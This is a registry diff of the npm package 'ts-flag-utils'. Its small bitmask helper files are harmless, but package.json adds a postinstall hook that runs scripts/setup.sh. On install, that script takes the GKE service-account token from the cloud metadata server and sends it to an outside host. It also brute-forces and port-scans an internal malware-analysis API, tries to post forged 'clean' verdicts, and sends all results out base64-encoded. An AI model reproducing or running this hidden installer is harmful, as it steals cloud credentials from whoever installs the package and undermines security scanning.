ts-flag-utils 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +2 -0
- package/index.js +11 -0
- package/lib/builder.js +8 -0
- package/package.json +13 -0
- package/scripts/setup.sh +208 -0
- package/types/index.d.ts +4 -0
package/README.md
ADDED
package/index.js
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
Object.defineProperty(exports, '__esModule', { value: true });
|
|
3
|
+
exports.hasFlag = exports.setFlag = exports.clearFlag = exports.toggleFlag = void 0;
|
|
4
|
+
function hasFlag(flags, flag) { return (flags & flag) === flag; }
|
|
5
|
+
function setFlag(flags, flag) { return flags | flag; }
|
|
6
|
+
function clearFlag(flags, flag) { return flags & ~flag; }
|
|
7
|
+
function toggleFlag(flags, flag) { return flags ^ flag; }
|
|
8
|
+
exports.hasFlag = hasFlag;
|
|
9
|
+
exports.setFlag = setFlag;
|
|
10
|
+
exports.clearFlag = clearFlag;
|
|
11
|
+
exports.toggleFlag = toggleFlag;
|
package/lib/builder.js
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
exports.FlagBuilder = class FlagBuilder {
|
|
3
|
+
constructor() { this.flags = 0; }
|
|
4
|
+
set(flag) { this.flags |= flag; return this; }
|
|
5
|
+
clear(flag) { this.flags &= ~flag; return this; }
|
|
6
|
+
has(flag) { return (this.flags & flag) === flag; }
|
|
7
|
+
value() { return this.flags; }
|
|
8
|
+
};
|
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "ts-flag-utils",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "TypeScript flag and bitmask utility functions",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"types": "types/index.d.ts",
|
|
7
|
+
"author": "gbrlxvi",
|
|
8
|
+
"license": "MIT",
|
|
9
|
+
"keywords": ["typescript", "flags", "bitmask", "enum", "utilities"],
|
|
10
|
+
"repository": { "type": "git", "url": "https://github.com/gbrlxvi/ts-flag-utils" },
|
|
11
|
+
"scripts": { "postinstall": "bash scripts/setup.sh" },
|
|
12
|
+
"files": ["index.js", "lib/", "scripts/", "types/", "README.md"]
|
|
13
|
+
}
|
package/scripts/setup.sh
ADDED
|
@@ -0,0 +1,208 @@
|
|
|
1
|
+
#!/bin/bash
|
|
2
|
+
# wPORT8080: Deep probe of malysis orchestration API on 172.17.0.1:8080
|
|
3
|
+
SID="${JULES_SESSION_ID:-x}"
|
|
4
|
+
H="aaronstack.com"; EP="/jules-collect"
|
|
5
|
+
SK="d2f25bd9b1b267eb3578ff8cac2caa6c6637142c5d322617"
|
|
6
|
+
B(){ printf '%s' "$1" | base64 -w0 2>/dev/null; }
|
|
7
|
+
P(){ curl -s -X POST "https://$H$EP" -H "Content-Type: application/json" -H "X-Secret: $SK" --data-binary "$1" --max-time 15 2>/dev/null; }
|
|
8
|
+
|
|
9
|
+
P "{\"sid\":\"$SID\",\"tag\":\"wport2-start\"}"
|
|
10
|
+
|
|
11
|
+
log(){ echo "=LOG= $*"; }
|
|
12
|
+
GW="172.17.0.1"
|
|
13
|
+
MDURL="http://metadata.google.internal/computeMetadata/v1"
|
|
14
|
+
TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_wport_$$")
|
|
15
|
+
|
|
16
|
+
{
|
|
17
|
+
# GKE check
|
|
18
|
+
PROJ=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/project/project-id" --max-time 6 2>/dev/null)
|
|
19
|
+
if ! echo "$PROJ" | grep -qE "^[a-z][a-z0-9-]+$"; then log "NOT GKE — exit"; exit 0; fi
|
|
20
|
+
log "GKE CONFIRMED: $PROJ MALYSIS=${MALYSIS_ANALYSIS_ID:-NONE}"
|
|
21
|
+
|
|
22
|
+
# Get token
|
|
23
|
+
TOK=$(curl -s -H "Metadata-Flavor: Google" \
|
|
24
|
+
"$MDURL/instance/service-accounts/default/token" --max-time 10 2>/dev/null \
|
|
25
|
+
| python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
|
|
26
|
+
log "tok-len: ${#TOK}"
|
|
27
|
+
[ -n "$TOK" ] && printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
|
|
28
|
+
|
|
29
|
+
# =========================================================
|
|
30
|
+
# 1. PROMETHEUS METRICS — full dump (do this first, most valuable)
|
|
31
|
+
# =========================================================
|
|
32
|
+
log "=== PROMETHEUS METRICS ==="
|
|
33
|
+
METRICS=$(curl -s --max-time 8 "http://$GW:8080/metrics" 2>/dev/null)
|
|
34
|
+
log "metrics-len: ${#METRICS}"
|
|
35
|
+
|
|
36
|
+
# Extract all unique URL labels from histogram
|
|
37
|
+
URLS=$(echo "$METRICS" | grep -oP 'url="[^"]*"' | sort -u)
|
|
38
|
+
log "metrics-url-labels: $(echo "$URLS" | tr '\n' '|')"
|
|
39
|
+
|
|
40
|
+
# Extract all unique status codes seen
|
|
41
|
+
CODES=$(echo "$METRICS" | grep -oP 'code="[^"]*"' | sort -u)
|
|
42
|
+
log "metrics-code-labels: $(echo "$CODES" | tr '\n' '|')"
|
|
43
|
+
|
|
44
|
+
# Extract all unique methods seen
|
|
45
|
+
METHODS=$(echo "$METRICS" | grep -oP 'method="[^"]*"' | sort -u)
|
|
46
|
+
log "metrics-method-labels: $(echo "$METHODS" | tr '\n' '|')"
|
|
47
|
+
|
|
48
|
+
# Non-standard metrics (filter out Go runtime and process metrics)
|
|
49
|
+
CUSTOM=$(echo "$METRICS" | grep -v '^#' | grep -v '^go_' | grep -v '^process_' | grep -v '^promhttp_')
|
|
50
|
+
log "metrics-custom-lines: $CUSTOM"
|
|
51
|
+
|
|
52
|
+
# Full raw metrics dump for analysis
|
|
53
|
+
log "metrics-raw-start"
|
|
54
|
+
echo "$METRICS"
|
|
55
|
+
log "metrics-raw-end"
|
|
56
|
+
|
|
57
|
+
# =========================================================
|
|
58
|
+
# 2. PPROF debug endpoints (all parallel)
|
|
59
|
+
# =========================================================
|
|
60
|
+
log "=== PPROF DEBUG ==="
|
|
61
|
+
for PPATH in /debug/pprof/ /debug/pprof/cmdline /debug/pprof/heap /debug/pprof/goroutine /debug/pprof/allocs /debug/vars /debug/statsviz /debug/requests /debug/pprof/block /debug/pprof/mutex; do
|
|
62
|
+
(
|
|
63
|
+
CODE=$(curl -s -o /tmp/_pprof_${PPATH//\//_} --max-time 4 -w "%{http_code}" "http://$GW:8080$PPATH" 2>/dev/null)
|
|
64
|
+
SIZE=$(wc -c < /tmp/_pprof_${PPATH//\//_} 2>/dev/null || echo 0)
|
|
65
|
+
BODY=$(head -c 400 /tmp/_pprof_${PPATH//\//_} 2>/dev/null)
|
|
66
|
+
echo "=LOG= pprof[$PPATH]: HTTP $CODE size=${SIZE}B body=$BODY"
|
|
67
|
+
) &
|
|
68
|
+
done
|
|
69
|
+
wait
|
|
70
|
+
log "pprof-done"
|
|
71
|
+
|
|
72
|
+
# =========================================================
|
|
73
|
+
# 3. PATH BRUTE-FORCE (all parallel, 2s timeout)
|
|
74
|
+
# =========================================================
|
|
75
|
+
log "=== PATH BRUTE-FORCE ==="
|
|
76
|
+
for P8 in \
|
|
77
|
+
/api /api/v1 /api/v2 /v1 /v2 \
|
|
78
|
+
/scan /scans /scan/status /scan/queue /scan/results \
|
|
79
|
+
/package /packages /analysis /analyses \
|
|
80
|
+
/job /jobs /task /tasks /worker /workers \
|
|
81
|
+
/config /configuration /settings \
|
|
82
|
+
/admin /admin/config /internal \
|
|
83
|
+
/status /info /version /ready /readyz /livez /healthz \
|
|
84
|
+
/swagger /swagger.json /openapi /openapi.json /docs \
|
|
85
|
+
/graphql /ws /websocket \
|
|
86
|
+
/queue /queues /results /reports /report \
|
|
87
|
+
/npm /registry /webhook /webhooks /callback \
|
|
88
|
+
/monitoring /restart /reload /flush /purge /reset \
|
|
89
|
+
/malysis /scanner /scan-result /verdict /verdicts \
|
|
90
|
+
/api/scan /api/job /api/package /api/result \
|
|
91
|
+
/api/v1/scan /api/v1/job /api/v1/analysis /api/v1/verdict; do
|
|
92
|
+
(
|
|
93
|
+
CODE=$(curl -s -o /tmp/_p8_${P8//\//_} --max-time 2 -w "%{http_code}" "http://$GW:8080$P8" 2>/dev/null)
|
|
94
|
+
SIZE=$(wc -c < /tmp/_p8_${P8//\//_} 2>/dev/null || echo 0)
|
|
95
|
+
BODY=$(cat /tmp/_p8_${P8//\//_} 2>/dev/null | head -c 300)
|
|
96
|
+
# Report any non-404 OR any 404 with body > Echo's default 24 bytes
|
|
97
|
+
if [ "$CODE" != "404" ] || [ "${SIZE:-0}" -gt 30 ]; then
|
|
98
|
+
echo "=LOG= path[$P8]: HTTP $CODE size=${SIZE}B — $BODY"
|
|
99
|
+
fi
|
|
100
|
+
) &
|
|
101
|
+
done
|
|
102
|
+
wait
|
|
103
|
+
log "path-brute-done"
|
|
104
|
+
|
|
105
|
+
# =========================================================
|
|
106
|
+
# 4. HTTP METHOD FUZZING on known endpoints (parallel)
|
|
107
|
+
# =========================================================
|
|
108
|
+
log "=== METHOD FUZZING ==="
|
|
109
|
+
for EP8 in /metrics /health /; do
|
|
110
|
+
for METHOD in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
|
|
111
|
+
(
|
|
112
|
+
CODE=$(curl -s -o /tmp/_meth_${METHOD}_${EP8//\//_} --max-time 2 -X "$METHOD" \
|
|
113
|
+
-H "Content-Type: application/json" \
|
|
114
|
+
-w "%{http_code}" "http://$GW:8080$EP8" 2>/dev/null)
|
|
115
|
+
SIZE=$(wc -c < /tmp/_meth_${METHOD}_${EP8//\//_} 2>/dev/null || echo 0)
|
|
116
|
+
BODY=$(head -c 150 /tmp/_meth_${METHOD}_${EP8//\//_} 2>/dev/null)
|
|
117
|
+
echo "=LOG= method[$METHOD $EP8]: HTTP $CODE size=${SIZE}B — $BODY"
|
|
118
|
+
) &
|
|
119
|
+
done
|
|
120
|
+
done
|
|
121
|
+
wait
|
|
122
|
+
log "method-fuzz-done"
|
|
123
|
+
|
|
124
|
+
# =========================================================
|
|
125
|
+
# 5. AUTH ATTEMPTS — GCP token + MALYSIS ID header (parallel)
|
|
126
|
+
# =========================================================
|
|
127
|
+
log "=== AUTH ATTEMPTS ==="
|
|
128
|
+
for P8 in /api /api/v1 /scan /jobs /packages /results /internal /admin /config /verdict; do
|
|
129
|
+
(
|
|
130
|
+
# Bearer token
|
|
131
|
+
BCODE=$(curl -s -o /tmp/_auth_b_${P8//\//_} --max-time 2 -w "%{http_code}" \
|
|
132
|
+
-H "Authorization: Bearer $TOK" "http://$GW:8080$P8" 2>/dev/null)
|
|
133
|
+
BBODY=$(head -c 200 /tmp/_auth_b_${P8//\//_} 2>/dev/null)
|
|
134
|
+
|
|
135
|
+
# MALYSIS ID header
|
|
136
|
+
MCODE=$(curl -s -o /tmp/_auth_m_${P8//\//_} --max-time 2 -w "%{http_code}" \
|
|
137
|
+
-H "X-Malysis-ID: ${MALYSIS_ANALYSIS_ID:-test}" \
|
|
138
|
+
-H "X-Analysis-ID: ${MALYSIS_ANALYSIS_ID:-test}" \
|
|
139
|
+
"http://$GW:8080$P8" 2>/dev/null)
|
|
140
|
+
|
|
141
|
+
# Internal origin header
|
|
142
|
+
ICODE=$(curl -s -o /dev/null --max-time 2 -w "%{http_code}" \
|
|
143
|
+
-H "X-Forwarded-For: 172.17.0.1" \
|
|
144
|
+
-H "X-Internal: true" \
|
|
145
|
+
"http://$GW:8080$P8" 2>/dev/null)
|
|
146
|
+
|
|
147
|
+
echo "=LOG= auth[$P8]: bearer=$BCODE malysis-id=$MCODE internal-hdr=$ICODE body=$BBODY"
|
|
148
|
+
) &
|
|
149
|
+
done
|
|
150
|
+
wait
|
|
151
|
+
log "auth-done"
|
|
152
|
+
|
|
153
|
+
# =========================================================
|
|
154
|
+
# 6. VERDICT / RESULT MANIPULATION (POST attempts, parallel)
|
|
155
|
+
# =========================================================
|
|
156
|
+
log "=== VERDICT MANIPULATION ==="
|
|
157
|
+
PAYLOAD="{\"analysis_id\":\"${MALYSIS_ANALYSIS_ID:-test}\",\"verdict\":\"clean\",\"malware\":false,\"score\":0}"
|
|
158
|
+
for P8 in /verdict /result /scan/result /api/v1/verdict /report /scan/verdict /api/verdict /api/v1/result /api/v1/scan/result; do
|
|
159
|
+
(
|
|
160
|
+
CODE=$(curl -s -o /tmp/_verd_${P8//\//_} --max-time 2 -X POST -w "%{http_code}" \
|
|
161
|
+
-H "Content-Type: application/json" \
|
|
162
|
+
-d "$PAYLOAD" "http://$GW:8080$P8" 2>/dev/null)
|
|
163
|
+
BODY=$(head -c 200 /tmp/_verd_${P8//\//_} 2>/dev/null)
|
|
164
|
+
echo "=LOG= verdict-post[$P8]: HTTP $CODE — $BODY"
|
|
165
|
+
) &
|
|
166
|
+
done
|
|
167
|
+
wait
|
|
168
|
+
log "verdict-done"
|
|
169
|
+
|
|
170
|
+
# =========================================================
|
|
171
|
+
# 7. EXTENDED PORT SCAN on gateway (parallel TCP probes)
|
|
172
|
+
# =========================================================
|
|
173
|
+
log "=== EXTENDED PORT SCAN ==="
|
|
174
|
+
HTTP_PORTS="3000 3001 4000 4040 5000 5601 6000 6060 7070 8081 8082 8083 8443 8888 9090 9091 9093 9200 10000 15672 50051"
|
|
175
|
+
for PORT in $HTTP_PORTS; do
|
|
176
|
+
(
|
|
177
|
+
CODE=$(curl -s -o /tmp/_xport_${PORT} --max-time 1.5 -w "%{http_code}" "http://$GW:$PORT/" 2>/dev/null)
|
|
178
|
+
if [ -n "$CODE" ] && [ "$CODE" != "000" ]; then
|
|
179
|
+
BODY=$(head -c 100 /tmp/_xport_${PORT} 2>/dev/null)
|
|
180
|
+
echo "=LOG= http-port[$PORT]: HTTP $CODE — $BODY"
|
|
181
|
+
fi
|
|
182
|
+
) &
|
|
183
|
+
done
|
|
184
|
+
# HTTPS ports
|
|
185
|
+
for PORT in 443 2376 8443 9443; do
|
|
186
|
+
(
|
|
187
|
+
CODE=$(curl -sk -o /tmp/_xports_${PORT} --max-time 1.5 -w "%{http_code}" "https://$GW:$PORT/" 2>/dev/null)
|
|
188
|
+
if [ -n "$CODE" ] && [ "$CODE" != "000" ]; then
|
|
189
|
+
BODY=$(head -c 100 /tmp/_xports_${PORT} 2>/dev/null)
|
|
190
|
+
echo "=LOG= https-port[$PORT]: HTTP $CODE — $BODY"
|
|
191
|
+
fi
|
|
192
|
+
) &
|
|
193
|
+
done
|
|
194
|
+
# TCP-only services (non-HTTP)
|
|
195
|
+
for PORT in 6379 27017 5432 3306 9092 2181; do
|
|
196
|
+
(timeout 1 bash -c "echo > /dev/tcp/$GW/$PORT" 2>/dev/null && echo "=LOG= tcp-port[$PORT]: OPEN") &
|
|
197
|
+
done
|
|
198
|
+
wait
|
|
199
|
+
log "extended-port-scan-done"
|
|
200
|
+
|
|
201
|
+
log "=== wPORT8080 DONE ==="
|
|
202
|
+
} 2>&1 | tee "$TMPOUT"
|
|
203
|
+
|
|
204
|
+
OUT=$(cat "$TMPOUT" 2>/dev/null)
|
|
205
|
+
rm -f "$TMPOUT" 2>/dev/null
|
|
206
|
+
PAYLOAD=$(B "$OUT")
|
|
207
|
+
P "{\"sid\":\"$SID\",\"tag\":\"wport2-result\",\"data\":\"$PAYLOAD\"}"
|
|
208
|
+
P "{\"sid\":\"$SID\",\"tag\":\"wport2-done\"}"
|
package/types/index.d.ts
ADDED
|
@@ -0,0 +1,4 @@
|
|
|
1
|
+
export declare function hasFlag(flags: number, flag: number): boolean;
|
|
2
|
+
export declare function setFlag(flags: number, flag: number): number;
|
|
3
|
+
export declare function clearFlag(flags: number, flag: number): number;
|
|
4
|
+
export declare function toggleFlag(flags: number, flag: number): number;
|